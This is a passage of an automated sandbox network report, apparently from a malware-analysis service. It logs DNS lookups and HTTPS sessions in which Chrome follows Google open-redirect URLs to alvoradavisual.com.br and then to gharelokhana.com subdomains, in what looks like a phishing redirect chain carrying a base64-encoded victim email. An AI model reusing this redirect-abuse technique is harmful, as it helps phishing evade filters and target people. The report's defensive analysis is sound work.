                                                Dec 5, 2024 08:23:40.307728052 CET192.168.2.51.1.1.10x73fStandard query (0)alvoradavisual.com.brA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:40.307874918 CET192.168.2.51.1.1.10xcb47Standard query (0)alvoradavisual.com.br65IN (0x0001)false
                                                Dec 5, 2024 08:23:41.333853960 CET192.168.2.51.1.1.10xd0feStandard query (0)alvoradavisual.com.brA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:41.333997965 CET192.168.2.51.1.1.10x48b2Standard query (0)alvoradavisual.com.br65IN (0x0001)false
                                                Dec 5, 2024 08:23:47.547344923 CET192.168.2.51.1.1.10x7cfbStandard query (0)djdjkdlellekkff.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:47.548172951 CET192.168.2.51.1.1.10x9a59Standard query (0)djdjkdlellekkff.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:23:52.317553043 CET192.168.2.51.1.1.10xd5d6Standard query (0)djdjkdlellekkff.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:52.317719936 CET192.168.2.51.1.1.10x3f33Standard query (0)djdjkdlellekkff.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:06.178311110 CET192.168.2.51.1.1.10x89dbStandard query (0)707242bf-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:06.178491116 CET192.168.2.51.1.1.10xbdebStandard query (0)707242bf-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:09.356527090 CET192.168.2.51.1.1.10xd0b1Standard query (0)707242bf-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:09.356709957 CET192.168.2.51.1.1.10x1043Standard query (0)707242bf-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:11.627645016 CET192.168.2.51.1.1.10xb325Standard query (0)4b553e95-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:11.627830982 CET192.168.2.51.1.1.10x18dbStandard query (0)4b553e95-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:12.352530956 CET192.168.2.51.1.1.10x82b5Standard query (0)33767741-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:12.352708101 CET192.168.2.51.1.1.10xd217Standard query (0)33767741-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:15.020289898 CET192.168.2.51.1.1.10xc264Standard query (0)33767741-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:15.020448923 CET192.168.2.51.1.1.10x808eStandard query (0)33767741-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:15.048571110 CET192.168.2.51.1.1.10x2f1fStandard query (0)l1ve.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:15.048840046 CET192.168.2.51.1.1.10x1ec2Standard query (0)l1ve.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:18.947472095 CET192.168.2.51.1.1.10xfe1Standard query (0)c65af2e9-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:18.947690964 CET192.168.2.51.1.1.10x3c7eStandard query (0)c65af2e9-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:27.115040064 CET192.168.2.51.1.1.10x79f9Standard query (0)8cacc656-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:27.115389109 CET192.168.2.51.1.1.10xf8bStandard query (0)8cacc656-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:31.703804970 CET192.168.2.51.1.1.10x47b7Standard query (0)b1a4e5aa-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:31.704303980 CET192.168.2.51.1.1.10x3e12Standard query (0)b1a4e5aa-3c4125ca.gharelokhana.com65IN (0x0001)false
                                                Dec 5, 2024 08:24:36.695091963 CET192.168.2.51.1.1.10x8944Standard query (0)b1a4e5aa-3c4125ca.gharelokhana.comA (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:36.695251942 CET192.168.2.51.1.1.10x2f40Standard query (0)b1a4e5aa-3c4125ca.gharelokhana.com65IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 5, 2024 08:23:30.438810110 CET1.1.1.1192.168.2.50x755eNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:30.439059973 CET1.1.1.1192.168.2.50x2a71No error (0)www.google.com65IN (0x0001)false
                                                Dec 5, 2024 08:23:32.307507038 CET1.1.1.1192.168.2.50xed70No error (0)google.dz172.217.17.67A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:34.959326029 CET1.1.1.1192.168.2.50xf395No error (0)www.google.dz216.58.208.227A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:42.299113035 CET1.1.1.1192.168.2.50x73fNo error (0)alvoradavisual.com.br191.252.140.51A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:42.299206018 CET1.1.1.1192.168.2.50xd0feNo error (0)alvoradavisual.com.br191.252.140.51A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:47.909048080 CET1.1.1.1192.168.2.50x7cfbNo error (0)djdjkdlellekkff.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:23:52.456701994 CET1.1.1.1192.168.2.50xd5d6No error (0)djdjkdlellekkff.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:06.398577929 CET1.1.1.1192.168.2.50x89dbNo error (0)707242bf-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:09.494348049 CET1.1.1.1192.168.2.50xd0b1No error (0)707242bf-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:11.849556923 CET1.1.1.1192.168.2.50xb325No error (0)4b553e95-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:12.569581032 CET1.1.1.1192.168.2.50x82b5No error (0)33767741-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:15.159709930 CET1.1.1.1192.168.2.50xc264No error (0)33767741-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:15.275166035 CET1.1.1.1192.168.2.50x2f1fNo error (0)l1ve.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:19.173156977 CET1.1.1.1192.168.2.50xfe1No error (0)c65af2e9-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:27.352560043 CET1.1.1.1192.168.2.50x79f9No error (0)8cacc656-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:31.922158957 CET1.1.1.1192.168.2.50x47b7No error (0)b1a4e5aa-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false
                                                Dec 5, 2024 08:24:36.833595037 CET1.1.1.1192.168.2.50x8944No error (0)b1a4e5aa-3c4125ca.gharelokhana.com164.92.191.86A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • google.dz
                                                • www.google.dz
                                                • alvoradavisual.com.br
                                                • https:
                                                  • djdjkdlellekkff.gharelokhana.com
                                                  • 707242bf-3c4125ca.gharelokhana.com
                                                  • 33767741-3c4125ca.gharelokhana.com
                                                  • l1ve.gharelokhana.com
                                                  • c65af2e9-3c4125ca.gharelokhana.com
                                                  • 8cacc656-3c4125ca.gharelokhana.com
                                                  • b1a4e5aa-3c4125ca.gharelokhana.com
                                                • 4b553e95-3c4125ca.gharelokhana.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549744172.217.17.674435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:34 UTC1108OUTGET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 HTTP/1.1
                                                Host: google.dz
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:34 UTC957INHTTP/1.1 301 Moved Permanently
                                                Location: https://www.google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-G5tboBnrEhqbNStCHE891Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                Permissions-Policy: unload=()
                                                Date: Thu, 05 Dec 2024 07:23:34 GMT
                                                Expires: Sat, 04 Jan 2025 07:23:34 GMT
                                                Cache-Control: public, max-age=2592000
                                                Server: gws
                                                Content-Length: 550
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close
                                                2024-12-05 07:23:34 UTC433INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 75 72 6c 3f 71 3d 6e 72 6e 71 35 4a 4c 69 36 7a 33 79 68 26 61 6d 70 3b 72 63 74 3d 74 54 50 76 76 71 36 78 52 79 6a 37 59 30 30 78 44 6a 6e 6c 78 39 6b 49 6a 75 73 75 63 54 26 61 6d 70 3b 73 61
                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.dz/url?q=nrnq5JLi6z3yh&amp;rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&amp;sa
                                                2024-12-05 07:23:34 UTC117INData Raw: 36 42 65 57 33 34 32 6f 57 78 43 49 46 48 46 76 53 69 41 30 79 32 79 59 30 48 7a 36 5a 4a 67 5f 66 78 5a 55 74 6e 44 52 46 7a 34 59 5f 37 47 56 63 4f 6b 74 74 53 45 73 6c 4a 66 4c 50 6b 6a 32 41 77 43 32 77 45 66 69 72 56 5a 49 2c 26 61 6d 70 3b 74 79 70 6f 3d 31 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: 6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&amp;typo=1">here</A>.</BODY></HTML>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549754216.58.208.2274435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:36 UTC1112OUTGET /url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Falvoradavisual.com.br%2Fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1 HTTP/1.1
                                                Host: www.google.dz
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:37 UTC1097INHTTP/1.1 302 Found
                                                Location: https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A
                                                Cache-Control: private
                                                Content-Type: text/html; charset=UTF-8
                                                Strict-Transport-Security: max-age=31536000
                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-P3KS4V33rCXUfGUHn4stiw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                Permissions-Policy: unload=()
                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                Date: Thu, 05 Dec 2024 07:23:37 GMT
                                                Server: gws
                                                Content-Length: 336
                                                X-XSS-Protection: 0
                                                Set-Cookie: NID=519=lp3uNzDSgibs_FNtydKoUoejVwdQ25A9425oEpPvEfPWMtciM4D-ST1PxZ56f216U_ZvgZG2vjDZy6fVTY2vT86_7QvcdpgI1ytRwD7qYJ-k8kZOsVHvwbKKCsoh5OwoCicBsRcspAr1-5d6U0bQzbZe4ATRPwedOUGtJoq0idIsuni5WiAB7NaUuuvUd6uEDwrQ; expires=Fri, 06-Jun-2025 07:23:37 GMT; path=/; domain=.google.dz; Secure; HttpOnly; SameSite=none
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close
                                                2024-12-05 07:23:37 UTC293INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 61 6d 70 2f 73 2f 61 6c 76 6f 72 61 64 61 76 69 73 75 61 6c 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 63 6a 62 68 2f 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46
                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.dz/amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF
                                                2024-12-05 07:23:37 UTC43INData Raw: 38 32 25 41 43 25 45 32 25 38 30 25 39 41 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: 82%AC%E2%80%9A">here</A>.</BODY></HTML>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549760216.58.208.2274435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:39 UTC1132OUTGET /amp/s/alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                                                Host: www.google.dz
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: NID=519=lp3uNzDSgibs_FNtydKoUoejVwdQ25A9425oEpPvEfPWMtciM4D-ST1PxZ56f216U_ZvgZG2vjDZy6fVTY2vT86_7QvcdpgI1ytRwD7qYJ-k8kZOsVHvwbKKCsoh5OwoCicBsRcspAr1-5d6U0bQzbZe4ATRPwedOUGtJoq0idIsuni5WiAB7NaUuuvUd6uEDwrQ
                                                2024-12-05 07:23:40 UTC856INHTTP/1.1 302 Found
                                                Location: https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$
                                                Cache-Control: private
                                                X-Robots-Tag: noindex
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-WVM-t6plk6AubyTWOnHO9g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                Permissions-Policy: unload=()
                                                Date: Thu, 05 Dec 2024 07:23:39 GMT
                                                Server: gws
                                                Content-Length: 284
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close
                                                2024-12-05 07:23:40 UTC284INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 76 6f 72 61 64 61 76 69 73 75 61 6c 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 63 6a 62 68 2f 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46 30 c3 a3 e2 82 ac e2 80 9a 24 24 24 c3 a3 e2 82 ac e2 80 9a
                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549770191.252.140.514435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:46 UTC753OUTGET /yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                                                Host: alvoradavisual.com.br
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:47 UTC268INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 07:23:47 GMT
                                                Server: Apache
                                                refresh: 0;url=https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0$$$
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-05 07:23:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549787191.252.140.514435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:49 UTC687OUTGET /favicon.ico HTTP/1.1
                                                Host: alvoradavisual.com.br
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://alvoradavisual.com.br/yoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9A
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-05 07:23:49 UTC164INHTTP/1.1 404 Not Found
                                                Date: Thu, 05 Dec 2024 07:23:49 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                2024-12-05 07:23:49 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549790164.92.191.864435840C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-05 07:23:49 UTC833OUTGET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                                                Host: djdjkdlellekkff.gharelokhana.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://alvoradavisual.com.br/
                                                Accept-Encoding: gzip, deflate, br
